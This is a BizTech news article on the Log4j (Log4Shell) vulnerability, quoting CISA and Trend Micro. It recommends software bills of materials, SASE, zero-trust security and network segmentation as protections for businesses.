Security

In the Wake of Log4j Exploits, How Can Businesses Protect Themselves?

The security vulnerability, called one of the worst ever seen, highlights the importance of building infrastructure with proactive security baked in.

Ernie Smith

Ernie Smith is a former contributor to BizTech, an old-school blogger who specializes in side projects, and a tech history nut who researches vintage operating systems for fun.

Late last year, a major vulnerability was revealed in a widely used open-source logging tool, causing a degree of panic among software developers and IT professionals.

The challenges presented by Log4j’s security vulnerabilities — which Jen Easterly, director of the federal Cybersecurity and Infrastructure Security Agency (CISA), called “one of the most serious I’ve seen in my entire career, if not the most serious” — underscore that IT professionals must be less reactionary in their approaches, so that when a problem emerges, they can minimize its impact on the overall network.

That might require a rethink of how infrastructure is managed.

What Kind of Vulnerability Affects Log4j in Java?

The vulnerability was in a commonly used remote logging tool called Log4j, which can be targeted by remote code execution. The tool, managed by the volunteer-led Apache Software Foundation and programmed using the Java programming language, has existed for decades. It has traditionally been a quiet part of many technology infrastructures, especially the foundation’s widely used HTTP server, one of the internet’s fundamental building blocks.

But in November of 2021, the discovery of a design flaw changed all that. As reported by Bloomberg, the flaw led to quick action on the part of the foundation as it attempted to get the exploit fixed.

Click the banner below to dig deeper into cloud security guidance from CDW.

News of the exploit, soon called Log4Shell, quickly spread. Early reports emerged of servers running the game Minecraft being compromised. It quickly became clear, however, that the exploit was widespread and that it would affect many more popular applications and technology tools beyond games.

“We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage,” Easterly said of the flaw.

Why Are These Vulnerabilities Harmful for Businesses?

Part of the challenge of Log4j is that it is a fundamental design flaw with the tool that interprets code as it’s being logged. This feature makes it easy for remote attackers to target a particular server and access portions of the code without authentication. For example, those who attacked affected Minecraft servers were able to execute rogue code through the game’s chat function alone.

Combine this with the wide number of devices that have utilized Log4j over the years, some of which may be connected devices that haven’t been actively maintained, and you suddenly have a widespread problem.

While a series of patches have since been released by the Apache Software Foundation — it took more than one patch to effectively stop the exploit — many applications of this logging software may prove challenging to update as a result.

William Malik, vice president of infrastructure strategies at Trend Micro, says that this incident reinforces the need to triage such situations to minimize the impact of the problem.

MORE SECURITY CONTENT: What organizations need to know for the future of security.

“Obviously, if it’s broken and you’re being exploited, then you do one of three things: You turn off logging; you apply whatever patch is available as quickly as possible; or you back things up and keep rolling with as much instrumentation and observation as possible, so you know what steps you took once you discovered there was a problem.”

More broadly, he says, a more fundamental approach needs to be considered.

How Can Businesses Protect Themselves Against More Vulnerabilities?

There are two important strategies to keep in mind when attempting to manage software exploits. One involves getting a better accounting of what technologies are in your infrastructure.

The increased use of open-source software, including Log4j but not limited to it, has underscored the need for a software bill of materials — an ingredient list for what’s in your infrastructure. CISA and other federal agencies have made a push to see these broadly implemented in the wake of Log4Shell and the recent wave of supply chain attacks.

Malik notes this is an important concept worth striving for, but says it is not an easy thing to implement on its own.

“You’ve got to know what you’re cooking with,” he says. “And the biggest challenge is to get that up to date and reoccurring, which is hard. I’m not throwing a rocket at anybody who hasn’t got this thing nailed down, because very few do — it’s a hard problem.”

The second strategy, while more complicated to implement, could help mitigate problems from wide-reaching exploits. This involves building a security framework that can minimize fires such as the zero-day incident that followed the Log4Shell revelations.

Click below to unlock exclusive security content when you become an Insider.

What Frameworks Can Businesses Use to Address These Threats?

Two primary frameworks that could work to mitigate outside exploits in situations like these have emerged in recent years.

The first, called secure access service edge (SASE), is a new type of networking model first outlined by Gartner in 2019. This framework involves a less centralized, server-dominated technology infrastructure, instead moving to a cloud-native architecture with a heavy use of containerization tools like Docker and Kubernetes. It also includes a more distributed approach to deploying content, which has the side effect of minimizing the impact of security vulnerabilities on cloud infrastructure.

“On the security side, SASE prescribes the converged offering of delivering unified threat and data protection capabilities,” a McAfee blog post notes. “This converged service is based upon a low-latency, ubiquitous footprint that is very close to the user location regardless of where they are.”

The other, zero-trust security, requires those accessing resources to prove who they are and what they’re trying to reach to ensure they should have access to those resources.

“Zero trust includes the notion that you don’t assume that everything is working properly, which means you check on things from time to time,” Trend Micro’s Malik says. “And the frequency is going to depend on your level of risk.”

Despite misconceptions about the approach, it has proven an increasingly popular element of many security infrastructures because it bakes security into the overall course of business.

WATCH: Dive deeper into how a zero trust strategy can meet your changing security needs.

How Can Businesses Implement These Frameworks?

Frameworks like SASE and zero trust come with parameters for implementation, and many of those issues move beyond IT and into areas like building a culture around cybersecurity.

There’s still something to be said about implementing firewalls to limit the impact of an exploit on infrastructure. Malik cites the example of a semiconductor manufacturing facility that had a virus flow through every single one of its machines in less than a minute.

“They had this huge, flat network, with no segmentation at all,” he says. “If they built 100 network segments, they would have lost 1 percent of capacity. As it was, they lost 100 percent of their capacity and they were down for a week.”

Ultimately, building an organization around a more sustainable framework means better, more thoughtful handling of security issues, minimizing the effects of a potential five-alarm fire like Log4Shell into something much more manageable, since exploits like zero-day attacks, malware and ransomware have little room to move within your infrastructure. This can not only protect the business, but also provide a better balance for employees.

“You know, it’s thrilling to be in an organization that is not governed by rules and procedures,” he says. “But it also means you don’t get to go to your kid’s ballet recital.”

gorodenkoff/Getty Images